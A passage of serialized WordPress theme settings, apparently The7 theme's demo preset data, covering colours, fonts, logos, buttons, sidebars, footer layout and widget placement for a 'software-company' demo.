0px\";s:27:\"header-style-mobile-logo_hd\";a:2:{i:0;s:74:\"/inc/presets/images/full/skin11r.header-style-mobile-logo-hd.png?w=88&h=88\";i:1;i:0;}s:32:\"header-style-mobile-logo_regular\";a:2:{i:0;s:79:\"/inc/presets/images/full/skin11r.header-style-mobile-logo-regular.png?w=44&h=44\";i:1;i:0;}s:36:\"header-style-transparent-choose_logo\";s:6:\"custom\";s:37:\"header-style-transparent-logo-padding\";s:15:\"0px 5px 0px 0px\";s:32:\"header-style-transparent-logo_hd\";a:2:{i:0;s:81:\"/inc/presets/images/full/skin11r.header-style-transparent-logo-hd.png?w=114&h=114\";i:1;i:0;}s:37:\"header-style-transparent-logo_regular\";a:2:{i:0;s:84:\"/inc/presets/images/full/skin11r.header-style-transparent-logo-regular.png?w=57&h=57\";i:1;i:0;}s:44:\"header-style-transparent-mobile-logo-padding\";s:15:\"0px 0px 0px 0px\";s:39:\"header-style-transparent-mobile-logo_hd\";a:2:{i:0;s:86:\"/inc/presets/images/full/skin11r.header-style-transparent-mobile-logo-hd.png?w=88&h=88\";i:1;i:0;}s:44:\"header-style-transparent-mobile-logo_regular\";a:2:{i:0;s:91:\"/inc/presets/images/full/skin11r.header-style-transparent-mobile-logo-regular.png?w=44&h=44\";i:1;i:0;}s:24:\"header-top_line-elements\";a:0:{}s:43:\"header-top_line-elements-below_menu-padding\";s:15:\"0px 0px 0px 0px\";s:54:\"header-top_line-elements-in_top_line-custom-icon-color\";s:0:\"\";s:53:\"header-top_line-elements-in_top_line-custom-icon-size\";s:2:\"16\";s:47:\"header-top_line-elements-in_top_line-font_color\";s:7:\"#888888\";s:47:\"header-top_line-elements-in_top_line-typography\";a:2:{s:11:\"font_family\";s:5:\"Arial\";s:9:\"font_size\";s:2:\"14\";}s:52:\"header-top_line-elements-near_menu-custom-icon-color\";s:0:\"\";s:51:\"header-top_line-elements-near_menu-custom-icon-size\";s:2:\"16\";s:45:\"header-top_line-elements-near_menu-font_color\";s:7:\"#888888\";s:45:\"header-top_line-elements-near_menu-typography\";a:2:{s:11:\"font_family\";s:5:\"Arial\";s:9:\"font_size\";s:2:\"14\";}s:41:\"header-top_line-elements-top_line-padding\";s:15:\"0px 0px 0px 0px\";s:47:\"header-top_line-elements-top_line_right-padding\";s:15:\"0px 0px 0px 0px\";s:29:\"header-top_line-show_elements\";s:1:\"0\";s:28:\"header-top_line-side-padding\";s:9:\"30px 30px\";s:31:\"header-top_line-switch_paddings\";s:3:\"0px\";s:31:\"header-top_line_mobile_paddings\";s:7:\"0px 0px\";s:43:\"header-transparent-mobile-first_switch-logo\";s:6:\"mobile\";s:44:\"header-transparent-mobile-second_switch-logo\";s:6:\"mobile\";s:27:\"header-transparent_bg_color\";s:18:\"rgba(238,238,34,1)\";s:17:\"header_navigation\";s:9:\"slide_out\";s:17:\"image_hover-color\";s:20:\"rgba(12,162,224,0.2)\";s:26:\"image_hover-color_gradient\";s:56:\"135deg|rgba(46,221,237,0.2) 30%|rgba(0,132,187,0.2) 100%\";s:22:\"image_hover-color_mode\";s:6:\"accent\";s:19:\"image_hover-opacity\";s:2:\"20\";s:34:\"image_hover-project_rollover_color\";s:16:\"rgba(0,0,0,0.85)\";s:43:\"image_hover-project_rollover_color_gradient\";s:58:\"135deg|rgba(46,221,237,0.85) 30%|rgba(0,132,187,0.85) 100%\";s:39:\"image_hover-project_rollover_color_mode\";s:6:\"accent\";s:36:\"image_hover-project_rollover_opacity\";s:2:\"85\";s:17:\"image_hover-style\";s:4:\"none\";s:14:\"input_bg_color\";s:19:\"rgba(253,253,253,1)\";s:18:\"input_border_color\";s:19:\"rgba(51,51,51,0.11)\";s:19:\"input_border_radius\";s:3:\"2px\";s:18:\"input_border_width\";s:15:\"1px 1px 1px 1px\";s:11:\"input_color\";s:7:\"#8b8d94\";s:12:\"input_height\";s:4:\"40px\";s:13:\"input_padding\";s:17:\"5px 15px 5px 15px\";s:25:\"layout-menu_icon-position\";s:15:\"menu_icon_right\";s:35:\"layout-menu_icon-show_floating_logo\";s:1:\"1\";s:22:\"layout-top_line-height\";s:5:\"130px\";s:28:\"layout-top_line-is_fullwidth\";s:1:\"0\";s:25:\"layout-top_line-is_sticky\";s:1:\"0\";s:29:\"layout-top_line-logo-position\";s:4:\"left\";s:42:\"menu-mobile-microwidgets-custom-icon-color\";s:0:\"\";s:41:\"menu-mobile-microwidgets-custom-icon-size\";s:2:\"16\";s:35:\"menu-mobile-microwidgets-font-color\";s:7:\"#b1b4b8\";s:35:\"menu-mobile-microwidgets-typography\";a:2:{s:11:\"font_family\";s:10:\"Roboto:500\";s:9:\"font_size\";s:2:\"13\";}s:16:\"message_bg_color\";s:0:\"\";s:13:\"message_color\";s:7:\"#ffffff\";s:32:\"microwidgets-search-active-width\";s:5:\"200px\";s:26:\"microwidgets-search-height\";s:4:\"34px\";s:30:\"microwidgets-search-typography\";a:2:{s:11:\"font_family\";s:6:\"Roboto\";s:9:\"font_size\";s:2:\"14\";}s:25:\"microwidgets-search-width\";s:5:\"200px\";s:35:\"microwidgets-search_bg-border-color\";s:7:\"#e2e2e2\";s:28:\"microwidgets-search_bg-color\";s:7:\"#f4f4f4\";s:36:\"microwidgets-search_bg_border_radius\";s:3:\"0px\";s:35:\"microwidgets-search_bg_border_width\";s:3:\"0px\";s:31:\"microwidgets-search_custom-icon\";s:24:\"the7-mw-icon-search-bold\";s:30:\"microwidgets-search_font-color\";s:7:\"#aaaaaa\";s:24:\"microwidgets-search_icon\";s:6:\"custom\";s:29:\"microwidgets-search_icon-size\";s:2:\"16\";s:33:\"microwidgets-search_input-padding\";s:9:\"12px 12px\";s:30:\"microwidgets-search_overlay-bg\";s:5:\"color\";s:36:\"microwidgets-search_overlay-bg-color\";s:15:\"rgba(0,0,0,0.9)\";s:39:\"microwidgets-search_overlay-bg-gradient\";s:31:\"135deg|#ffffff 30%|#000000 100%\";s:25:\"microwidgets-search_style\";s:5:\"popup\";s:52:\"page_title-background-style-transparent-color_scheme\";s:5:\"light\";s:18:\"page_title-padding\";s:9:\"30px 30px\";s:26:\"post-show_fancy_categories\";s:1:\"1\";s:20:\"post-show_fancy_date\";s:1:\"1\";s:6:\"preset\";s:7:\"skin11r\";s:33:\"show_static_part_of_archive_title\";s:1:\"1\";s:16:\"sidebar-bg_color\";s:19:\"rgba(247,247,248,1)\";s:16:\"sidebar-bg_image\";a:4:{s:5:\"image\";s:0:\"\";s:6:\"repeat\";s:6:\"repeat\";s:10:\"position_x\";s:6:\"center\";s:10:\"position_y\";s:6:\"center\";}s:18:\"sidebar-decoration\";s:4:\"none\";s:32:\"sidebar-decoration_outline_color\";s:16:\"rgba(0,0,0,0.06)\";s:27:\"sidebar-distance_to_content\";s:4:\"50px\";s:26:\"sidebar-divider-horizontal\";s:1:\"0\";s:24:\"sidebar-divider-vertical\";s:1:\"1\";s:16:\"sidebar-floating\";b:0;s:21:\"sidebar-headers_color\";s:7:\"#333333\";s:26:\"sidebar-primary_text_color\";s:7:\"#8b8d94\";s:22:\"sidebar-responsiveness\";s:5:\"992px\";s:25:\"sidebar-vertical_distance\";s:4:\"60px\";s:20:\"sidebar-visual_style\";s:13:\"with_dividers\";s:13:\"sidebar-width\";s:5:\"350px\";s:19:\"social_buttons-page\";a:0:{}s:32:\"social_buttons-page-button_title\";s:15:\"Share this page\";s:20:\"social_buttons-photo\";a:0:{}s:33:\"social_buttons-photo-button_title\";s:16:\"Share this image\";s:29:\"social_buttons-portfolio_post\";a:0:{}s:42:\"social_buttons-portfolio_post-button_title\";s:15:\"Share this post\";s:19:\"social_buttons-post\";a:0:{}s:32:\"social_buttons-post-button_title\";s:15:\"Share this post\";s:25:\"social_buttons-visibility\";s:7:\"allways\";s:25:\"stripes-stripe_1_bg_image\";a:4:{s:5:\"image\";s:0:\"\";s:6:\"repeat\";s:6:\"repeat\";s:10:\"position_x\";s:6:\"center\";s:10:\"position_y\";s:6:\"center\";}s:22:\"stripes-stripe_1_color\";s:7:\"#f8f8f9\";s:39:\"stripes-stripe_1_content_boxes_bg_color\";s:7:\"#ffffff\";s:41:\"stripes-stripe_1_content_boxes_bg_opacity\";s:3:\"100\";s:41:\"stripes-stripe_1_content_boxes_decoration\";s:4:\"none\";s:55:\"stripes-stripe_1_content_boxes_decoration_outline_color\";s:7:\"#dd3333\";s:57:\"stripes-stripe_1_content_boxes_decoration_outline_opacity\";s:3:\"100\";s:30:\"stripes-stripe_1_headers_color\";s:7:\"#3b3f4a\";s:24:\"stripes-stripe_1_outline\";s:4:\"hide\";s:30:\"stripes-stripe_1_outline_color\";s:7:\"#44bb70\";s:32:\"stripes-stripe_1_outline_opacity\";s:3:\"100\";s:27:\"stripes-stripe_1_text_color\";s:7:\"#787d85\";s:25:\"stripes-stripe_2_bg_image\";a:4:{s:5:\"image\";s:0:\"\";s:6:\"repeat\";s:6:\"repeat\";s:10:\"position_x\";s:6:\"center\";s:10:\"position_y\";s:6:\"center\";}s:22:\"stripes-stripe_2_color\";s:7:\"#23262d\";s:39:\"stripes-stripe_2_content_boxes_bg_color\";s:7:\"#ffffff\";s:41:\"stripes-stripe_2_content_boxes_bg_opacity\";s:2:\"10\";s:41:\"stripes-stripe_2_content_boxes_decoration\";s:4:\"none\";s:55:\"stripes-stripe_2_content_boxes_decoration_outline_color\";s:7:\"#ffffff\";s:57:\"stripes-stripe_2_content_boxes_decoration_outline_opacity\";s:2:\"15\";s:30:\"stripes-stripe_2_headers_color\";s:7:\"#ffffff\";s:24:\"stripes-stripe_2_outline\";s:4:\"hide\";s:30:\"stripes-stripe_2_outline_color\";s:7:\"#ffffff\";s:32:\"stripes-stripe_2_outline_opacity\";s:2:\"15\";s:27:\"stripes-stripe_2_text_color\";s:7:\"#8b9199\";s:25:\"stripes-stripe_3_bg_image\";a:4:{s:5:\"image\";s:61:\"/inc/presets/images/full/skin22.stripes-stripe-3-bg-image.jpg\";s:6:\"repeat\";s:6:\"repeat\";s:10:\"position_x\";s:6:\"center\";s:10:\"position_y\";s:6:\"center\";}s:22:\"stripes-stripe_3_color\";s:7:\"#000000\";s:39:\"stripes-stripe_3_content_boxes_bg_color\";s:7:\"#ffffff\";s:41:\"stripes-stripe_3_content_boxes_bg_opacity\";s:2:\"10\";s:41:\"stripes-stripe_3_content_boxes_decoration\";s:4:\"none\";s:55:\"stripes-stripe_3_content_boxes_decoration_outline_color\";s:7:\"#ffffff\";s:57:\"stripes-stripe_3_content_boxes_decoration_outline_opacity\";s:2:\"19\";s:30:\"stripes-stripe_3_headers_color\";s:7:\"#ffffff\";s:24:\"stripes-stripe_3_outline\";s:4:\"hide\";s:30:\"stripes-stripe_3_outline_color\";s:7:\"#252728\";s:32:\"stripes-stripe_3_outline_opacity\";s:3:\"100\";s:27:\"stripes-stripe_3_text_color\";s:7:\"#ffffff\";s:20:\"template_page_id_404\";i:0;s:23:\"template_page_id_author\";i:0;s:36:\"template_page_id_author_full_content\";s:1:\"0\";s:30:\"template_page_id_blog_category\";i:0;s:43:\"template_page_id_blog_category_full_content\";s:1:\"0\";s:26:\"template_page_id_blog_tags\";i:0;s:39:\"template_page_id_blog_tags_full_content\";s:1:\"0\";s:21:\"template_page_id_date\";i:0;s:34:\"template_page_id_date_full_content\";s:1:\"0\";s:23:\"template_page_id_search\";i:0;s:36:\"template_page_id_search_full_content\";s:1:\"0\";s:19:\"the7_opengraph_tags\";s:1:\"1\";s:14:\"top-bar-height\";s:4:\"36px\";s:28:\"top-bar-transparent_bg_color\";s:15:\"rgba(0,0,0,0.5)\";s:16:\"top_bar-bg-color\";s:19:\"rgba(255,255,255,0)\";s:16:\"top_bar-bg-image\";a:4:{s:5:\"image\";s:0:\"\";s:6:\"repeat\";s:6:\"repeat\";s:10:\"position_x\";s:6:\"center\";s:10:\"position_y\";s:6:\"center\";}s:16:\"top_bar-bg-style\";s:14:\"fullwidth_line\";s:25:\"top_bar-custom-icon-color\";s:0:\"\";s:24:\"top_bar-custom-icon-size\";s:2:\"16\";s:18:\"top_bar-font-color\";s:7:\"#b1b4b8\";s:18:\"top_bar-line-color\";s:19:\"rgba(51,51,51,0.11)\";s:34:\"top_bar-line-in-transparent-header\";b:0;s:17:\"top_bar-line_size\";s:3:\"1px\";s:18:\"top_bar-line_style\";s:5:\"solid\";s:15:\"top_bar-padding\";s:17:\"3px 50px 3px 50px\";s:23:\"top_bar-switch_paddings\";s:5:\"600px\";s:18:\"top_bar-typography\";a:3:{s:11:\"font_family\";s:10:\"Roboto:500\";s:14:\"text_transform\";s:4:\"none\";s:9:\"font_size\";s:2:\"13\";}s:23:\"top_bar_mobile_paddings\";s:17:\"3px 20px 3px 20px\";s:10:\"widget_gap\";s:4:\"20px\";s:11:\"widgetareas\";a:2:{i:1;a:2:{s:12:\"sidebar_name\";s:15:\"Default Sidebar\";s:12:\"sidebar_desc\";s:27:\"Sidebar primary widget area\";}i:2;a:2:{s:12:\"sidebar_name\";s:14:\"Default Footer\";s:12:\"sidebar_desc\";s:26:\"Footer primary widget area\";}}}}}s:16:\"software-company\";a:10:{s:23:\"the7_dashboard_settings\";a:13:{s:9:\"mega-menu\";b:1;s:29:\"elementor-buttons-integration\";b:0;s:21:\"elementor-theme-style\";b:0;s:37:\"elementor-zero-paragraph-last-spacing\";b:0;s:29:\"deprecated_mega_menu_settings\";b:1;s:9:\"portfolio\";b:1;s:26:\"portfolio-breadcrumbs-text\";s:0:\"\";s:12:\"testimonials\";b:0;s:4:\"team\";b:0;s:5:\"logos\";b:0;s:8:\"benefits\";b:0;s:6:\"albums\";b:0;s:9:\"slideshow\";b:0;}s:11:\"wp_settings\";a:2:{s:13:\"show_on_front\";s:4:\"page\";s:13:\"page_on_front\";s:4:\"2150\";}s:14:\"menu_locations\";a:1:{s:6:\"bottom\";i:4;}s:16:\"widgets_settings\";a:11:{s:15:\"widget_archives\";a:2:{i:2;a:3:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}s:11:\"widget_meta\";a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}s:13:\"widget_search\";a:2:{i:2;a:1:{s:5:\"title\";s:0:\"\";}s:12:\"_multiwidget\";i:1;}s:11:\"widget_text\";a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}s:17:\"widget_categories\";a:2:{i:2;a:4:{s:5:\"title\";s:0:\"\";s:5:\"count\";i:0;s:12:\"hierarchical\";i:0;s:8:\"dropdown\";i:0;}s:12:\"_multiwidget\";i:1;}s:19:\"widget_recent-posts\";a:2:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}s:12:\"_multiwidget\";i:1;}s:22:\"widget_recent-comments\";a:2:{i:2;a:2:{s:5:\"title\";s:0:\"\";s:6:\"number\";i:5;}s:12:\"_multiwidget\";i:1;}s:10:\"widget_rss\";a:2:{i:1;a:0:{}s:12:\"_multiwidget\";i:1;}s:36:\"widget_presscore-contact-form-widget\";a:1:{s:12:\"_multiwidget\";i:1;}s:26:\"widget_presscore-portfolio\";a:2:{i:2;a:7:{s:5:\"title\";s:10:\"More demos\";s:5:\"order\";s:4:\"DESC\";s:7:\"orderby\";s:4:\"date\";s:6:\"select\";s:3:\"all\";s:4:\"show\";i:24;s:4:\"cats\";a:0:{}s:9:\"max_width\";i:110;}s:12:\"_multiwidget\";i:1;}s:16:\"sidebars_widgets\";a:5:{s:18:\"orphaned_widgets_1\";a:6:{i:0;s:8:\"search-2\";i:1;s:14:\"recent-posts-2\";i:2;s:17:\"recent-comments-2\";i:3;s:10:\"archives-2\";i:4;s:12:\"categories-2\";i:5;s:6:\"meta-2\";}s:19:\"wp_inactive_widgets\";a:1:{i:0;s:4:\"9022\";}s:9:\"sidebar_1\";a:1:{i:0;s:21:\"presscore-portfolio-2\";}s:9:\"sidebar_2\";a:0:{}s:13:\"array_version\";i:3;}}s:10:\"post_types\";b:1;s:22:\"attachments_in_process\";i:3;s:11:\"attachments\";s:8:\"original\";s:11:\"rev_sliders\";a:1:{i:0;i:4;}s:13:\"theme_options\";a:1:{s:4:\"the7\";a:983:{s:31:\"advanced-fvm_enable_integration\";s:1:\"0\";s:27:\"advanced-fvm_script_timeout\";s:4:\"50ms\";s:35:\"advanced-normalize_resize_on_mobile\";s:1:\"1\";s:25:\"advanced-speed_img_resize\";s:1:\"0\";s:21:\"blog-fancy_date-style\";s:6:\"circle\";s:26:\"blog-thumbnail_proportions\";a:2:{s:5:\"width\";i:2;s:6:\"height\";i:1;}s:19:\"blog-thumbnail_size\";s:6:\"resize\";s:19:\"bottom_bar-bg_color\";s:22:\"rgba(255,255,255,0.13)\";s:19:\"bottom_bar-bg_image\";a:4:{s:5:\"image\";s:0:\"\";s:6:\"repeat\";s:6:\"repeat\";s:10:\"position_x\";s:6:\"center\";s:10:\"position_y\";s:3:\"top\";}s:25:\"bottom_bar-collapse_after\";s:5:\"990px\";s:16:\"bottom_bar-color\";s:7:\"#ffffff\";s:21:\"bottom_bar-copyrights\";s:0:\"\";s:18:\"bottom_bar-credits\";s:1:\"1\";s:18:\"bottom_bar-enabled\";s:1:\"1\";s:17:\"bottom_bar-height\";s:4:\"60px\";s:17:\"bottom_bar-layout\";s:9:\"logo_left\";s:20:\"bottom_bar-line_size\";s:3:\"1px\";s:23:\"bottom_bar-logo-padding\";s:16:\"8px 12px 8px 0px\";s:18:\"bottom_bar-logo_hd\";a:2:{i:0;s:65:\"/inc/presets/images/full/skin11r.bottom-bar-logo-hd.png?w=56&h=56\";i:1;i:0;}s:23:\"bottom_bar-logo_regular\";a:2:{i:0;s:70:\"/inc/presets/images/full/skin11r.bottom-bar-logo-regular.png?w=28&h=28\";i:1;i:0;}s:30:\"bottom_bar-menu-collapse_after\";s:5:\"778px\";s:18:\"bottom_bar-padding\";s:9:\"10px 10px\";s:16:\"bottom_bar-style\";s:18:\"content_width_line\";s:15:\"bottom_bar-text\";s:0:\"\";s:22:\"breadcrumbs-typography\";a:4:{s:11:\"font_family\";s:9:\"Open Sans\";s:14:\"text_transform\";s:4:\"none\";s:9:\"font_size\";s:2:\"13\";s:11:\"line_height\";s:2:\"25\";}s:20:\"breadcrumbs_bg_color\";s:21:\"rgba(255,255,255,0.2)\";s:24:\"breadcrumbs_border_color\";s:21:\"rgba(255,255,255,0.5)\";s:25:\"breadcrumbs_border_radius\";s:3:\"2px\";s:24:\"breadcrumbs_border_width\";s:3:\"0px\";s:18:\"breadcrumbs_margin\";s:15:\"0px 0px 0px 0px\";s:19:\"breadcrumbs_padding\";s:15:\"0px 0px 0px 0px\";s:13:\"button-shadow\";a:6:{s:5:\"color\";s:13:\"rgba(0,0,0,0)\";s:10:\"horizontal\";s:1:\"0\";s:8:\"vertical\";s:1:\"0\";s:4:\"blur\";s:2:\"10\";s:6:\"spread\";s:1:\"0\";s:8:\"position\";s:7:\"outline\";}s:19:\"button-shadow-hover\";a:6:{s:5:\"color\";s:13:\"rgba(0,0,0,0)\";s:10:\"horizontal\";s:1:\"0\";s:8:\"vertical\";s:1:\"0\";s:4:\"blur\";s:2:\"10\";s:6:\"spread\";s:1:\"0\";s:8:\"position\";s:7:\"outline\";}s:20:\"buttons-border-color\";s:7:\"#ffffff\";s:25:\"buttons-border-color_mode\";s:6:\"accent\";s:13:\"buttons-color\";s:7:\"#81d742\";s:22:\"buttons-color_gradient\";s:31:\"135deg|#13aa4a 30%|#84df31 100%\";s:18:\"buttons-color_mode\";s:6:\"accent\";s:26:\"buttons-hover-border-color\";s:7:\"#ffffff\";s:31:\"buttons-hover-border-color_mode\";s:6:\"accent\";s:19:\"buttons-hover_color\";s:7:\"#81d742\";s:28:\"buttons-hover_color_gradient\";s:31:\"135deg|#119fd3 30%|#24c693 100%\";s:24:\"buttons-hover_color_mode\";s:8:\"gradient\";s:26:\"buttons-l-custom-icon-size\";s:1:\"1\";s:19:\"buttons-l-icon-size\";s:2:\"20\";s:20:\"buttons-l-min-height\";s:3:\"1px\";s:19:\"buttons-l-min-width\";s:3:\"1px\";s:20:\"buttons-l-typography\";a:3:{s:11:\"font_family\";s:6:\"Roboto\";s:14:\"text_transform\";s:4:\"none\";s:9:\"font_size\";s:2:\"20\";}s:23:\"buttons-l_border_radius\";s:3:\"4px\";s:22:\"buttons-l_border_width\";s:3:\"0px\";s:17:\"buttons-l_padding\";s:19:\"18px 26px 18px 26px\";s:27:\"buttons-lg-custom-icon-size\";b:0;s:26:\"buttons-m-custom-icon-size\";s:1:\"1\";s:19:\"buttons-m-icon-size\";s:2:\"16\";s:20:\"buttons-m-min-height\";s:3:\"1px\";s:19:\"buttons-m-min-width\";s:3:\"1px\";s:20:\"buttons-m-typography\";a:3:{s:11:\"font_family\";s:6:\"Roboto\";s:14:\"text_transform\";s:4:\"none\";s:9:\"font_size\";s:2:\"16\";}s:23:\"buttons-m_border_radius\";s:3:\"3px\";s:22:\"buttons-m_border_width\";s:3:\"0px\";s:17:\"buttons-m_padding\";s:19:\"13px 22px 13px 22px\";s:26:\"buttons-s-custom-icon-size\";s:1:\"1\";s:19:\"buttons-s-icon-size\";s:2:\"14\";s:20:\"buttons-s-min-height\";s:3:\"1px\";s:19:\"buttons-s-min-width\";s:3:\"1px\";s:20:\"buttons-s-typography\";a:3:{s:11:\"font_family\";s:6:\"Roboto\";s:14:\"text_transform\";s:4:\"none\";s:9:\"font_size\";s:2:\"13\";}s:23:\"buttons-s_border_radius\";s:3:\"3px\";s:22:\"buttons-s_border_width\";s:3:\"0px\";s:17:\"buttons-s_padding\";s:19:\"10px 14px 10px 14px\";s:18:\"buttons-text_color\";s:7:\"#ffffff\";s:23:\"buttons-text_color_mode\";s:5:\"color\";s:24:\"buttons-text_hover_color\";s:7:\"#ffffff\";s:29:\"buttons-text_hover_color_mode\";s:5:\"color\";s:27:\"buttons-xl-custom-icon-size\";b:0;s:20:\"contact_form_message\";s:1:\"1\";s:33:\"contact_form_recaptcha_secret_key\";s:0:\"\";s:31:\"contact_form_recaptcha_site_key\";s:0:\"\";s:27:\"contact_form_security_token\";s:20:\"eed685ff90c0efbbe983\";s:21:\"content-headers_color\";s:7:\"#292e36\";s:19:\"content-links_color\";s:7:\"#1ebbf0\";s:26:\"content-primary_text_color\";s:7:\"#787d85\";s:28:\"content-secondary_text_color\";s:7:\"#adb0b6\";s:21:\"custom_error_messages\";s:48:\"The message has not been sent. Plaese try again.\";s:32:\"custom_error_messages_validation\";s:61:\"One or more fields have an error. Please check and try again.\";s:23:\"custom_success_messages\";s:27:\"Your message has been sent.\";s:14:\"dividers-color\";s:21:\"rgba(173,176,182,0.3)\";s:17:\"filter-typography\";a:3:{s:11:\"font_family\";s:10:\"Roboto:700\";s:14:\"text_transform\";s:4:\"none\";s:9:\"font_size\";s:2:\"15\";}s:14:\"fonts-big_size\";a:2:{s:9:\"font_size\";s:4:\"15px\";s:11:\"line_height\";s:4:\"28px\";}s:17:\"fonts-font_family\";s:9:\"Open Sans\";s:19:\"fonts-h1-typography\";a:4:{s:11:\"font_family\";s:6:\"Roboto\";s:20:\"responsive_font_size\";a:3:{s:7:\"desktop\";s:4:\"48px\";s:6:\"tablet\";s:4:\"36px\";s:6:\"mobile\";s:4:\"36px\";}s:22:\"responsive_line_height\";a:1:{s:7:\"desktop\";s:4:\"58px\";}s:14:\"text_transform\";s:4:\"none\";}s:19:\"fonts-h2-typography\";a:4:{s:11:\"font_family\";s:6:\"Roboto\";s:20:\"responsive_font_size\";a:1:{s:7:\"desktop\";s:4:\"36px\";}s:22:\"responsive_line_height\";a:1:{s:7:\"desktop\";s:4:\"46px\";}s:14:\"text_transform\";s:4:\"none\";}s:19:\"fonts-h3-typography\";a:4:{s:11:\"font_family\";s:6:\"Roboto\";s:20:\"responsive_font_size\";a:1:{s:7:\"desktop\";s:4:\"28px\";}s:22:\"responsive_line_height\";a:1:{s:7:\"desktop\";s:4:\"38px\";}s:14:\"text_transform\";s:4:\"none\";}s:19:\"fonts-h4-typography\";a:4:{s:11:\"font_family\";s:6:\"Roboto\";s:20:\"responsive_font_size\";a:1:{s:7:\"desktop\";s:4:\"20px\";}s:22:\"responsive_line_height\";a:1:{s:7:\"desktop\";s:4:\"32px\";}s:14:\"text_transform\";s:4:\"none\";}s:19:\"fonts-h5-typography\";a:4:{s:11:\"font_family\";s:10:\"Roboto:700\";s:20:\"responsive_font_size\";a:1:{s:7:\"desktop\";s:4:\"18px\";}s:22:\"responsive_line_height\";a:1:{s:7:\"desktop\";s:4:\"28px\";}s:14:\"text_transform\";s:4:\"none\";}s:19:\"fonts-h6-typography\";a:4:{s:11:\"font_family\";s:10:\"Roboto:700\";s:20:\"responsive_font_size\";a:1:{s:7:\"desktop\";s:4:\"14px\";}s:22:\"responsive_line_height\";a:1:{s:7:\"desktop\";s:4:\"26px\";}s:14:\"text_transform\";s:4:\"none\";}s:25:\"fonts-headers-font-family\";s:0:\"\";s:28:\"fonts-headers-text-transform\";s:0:\"\";s:17:\"fonts-normal_size\";a:2:{s:9:\"font_size\";s:4:\"14px\";s:11:\"line_height\";s:4:\"26px\";}s:16:\"fonts-small_size\";a:2:{s:9:\"font_size\";s:4:\"13px\";s:11:\"line_height\";s:4:\"25px\";}s:20:\"fonts-widget-content\";a:3:{s:11:\"font_family\";s:9:\"Open Sans\";s:20:\"responsive_font_size\";a:1:{s:7:\"desktop\";s:4:\"14px\";}s:22:\"responsive_line_height\";a:1:{s:7:\"desktop\";s:4:\"26px\";}}s:18:\"fonts-widget-title\";a:4:{s:11:\"font_family\";s:10:\"Roboto:700\";s:20:\"responsive_font_size\";a:1:{s:7:\"desktop\";s:4:\"18px\";}s:22:\"responsive_line_height\";a:1:{s:7:\"desktop\";s:4:\"28px\";}s:14:\"text_transform\";s:4:\"none\";}s:24:\"footer-accent_text_color\";s:0:\"\";s:15:\"footer-bg_color\";s:16:\"rgba(35,38,45,1)\";s:15:\"footer-bg_image\";a:4:{s:5:\"image\";s:0:\"\";s:6:\"repeat\";s:6:\"repeat\";s:10:\"position_x\";s:6:\"center\";s:10:\"position_y\";s:3:\"top\";}s:21:\"footer-collapse_after\";s:5:\"760px\";s:29:\"footer-collapse_columns_after\";s:5:\"760px\";s:17:\"footer-decoration\";s:4:\"none\";s:27:\"footer-decoration-line_size\";s:3:\"1px\";s:31:\"footer-decoration_outline_color\";s:21:\"rgba(129,215,66,0.96)\";s:20:\"footer-headers_color\";s:7:\"#ffffff\";s:19:\"footer-is_fullwidth\";s:1:\"0\";s:13:\"footer-layout\";s:11:\"1/3+1/3+1/3\";s:21:\"footer-mobile_padding\";s:19:\"50px 20px 15px 20px\";s:14:\"footer-padding\";s:19:\"50px 20px 15px 20px\";s:23:\"footer-paddings-columns\";s:4:\"25px\";s:25:\"footer-primary_text_color\";s:7:\"#ffffff\";s:21:\"footer-slide-out-mode\";s:1:\"0\";s:12:\"footer-style\";s:16:\"solid_background\";s:23:\"general-accent_bg_color\";s:7:\"#5891e8\";s:32:\"general-accent_bg_color_gradient\";s:31:\"135deg|#07b5ef 44%|#39dfaa 100%\";s:25:\"general-accent_color_mode\";s:8:\"gradient\";s:25:\"general-beautiful_loading\";s:8:\"disabled\";s:16:\"general-bg_color\";s:19:\"rgba(255,255,255,1)\";s:16:\"general-bg_fixed\";s:1:\"1\";s:21:\"general-bg_fullscreen\";b:0;s:16:\"general-bg_image\";a:4:{s:5:\"image\";s:0:\"\";s:6:\"repeat\";s:6:\"repeat\";s:10:\"position_x\";s:6:\"center\";s:10:\"position_y\";s:3:\"top\";}s:24:\"general-blog_meta_author\";s:1:\"1\";s:28:\"general-blog_meta_categories\";s:1:\"1\";s:26:\"general-blog_meta_comments\";s:1:\"1\";s:22:\"general-blog_meta_date\";s:1:\"1\";s:20:\"general-blog_meta_on\";s:1:\"1\";s:22:\"general-blog_meta_tags\";s:1:\"1\";s:21:\"general-border_radius\";s:3:\"2px\";s:17:\"general-box_width\";s:6:\"1280px\";s:22:\"general-boxed_bg_color\";s:7:\"#bdbdf9\";s:22:\"general-boxed_bg_fixed\";s:1:\"1\";s:27:\"general-boxed_bg_fullscreen\";s:1:\"1\";s:22:\"general-boxed_bg_image\";a:4:{s:5:\"image\";s:33:\"/wp-content/uploads/2022/10/1.jpg\";s:6:\"repeat\";s:9:\"no-repeat\";s:10:\"position_x\";s:6:\"center\";s:10:\"position_y\";s:6:\"center\";}s:28:\"general-breadcrumbs_bg_color\";s:8:\"disabled\";s:25:\"general-breadcrumbs_color\";s:7:\"#adb0b6\";s:33:\"general-contact_form_send_mail_to\";s:0:\"\";s:30:\"general-content_boxes_bg_color\";s:19:\"rgba(248,248,249,1)\";s:32:\"general-content_boxes_decoration\";s:4:\"none\";s:46:\"general-content_boxes_decoration_outline_color\";s:13:\"rgba(0,0,0,0)\";s:21:\"general-content_width\";s:6:\"1190px\";s:18:\"general-custom_css\";s:142:\".layzr-bg-off .layzr-bg:not(.layzr-bg-transparent) {\r\n    background-color: transparent;\r\n}\r\n#dt-btn-1,\r\n#dt-btn-2 {\r\n    margin-bottom: 0;\r\n}\";s:21:\"general-custom_loader\";s:0:\"\";s:15:\"general-favicon\";s:54:\"/wp-content/uploads/sites/84/2016/11/the7-new-fav1.gif\";s:18:\"general-favicon_hd\";s:57:\"/wp-content/uploads/sites/84/2016/11/the7-new-fav-hd1.gif\";s:21:\"general-filter-margin\";s:17:\"0px 15px 0px 15px\";s:22:\"general-filter-padding\";s:15:\"6px 0px 6px 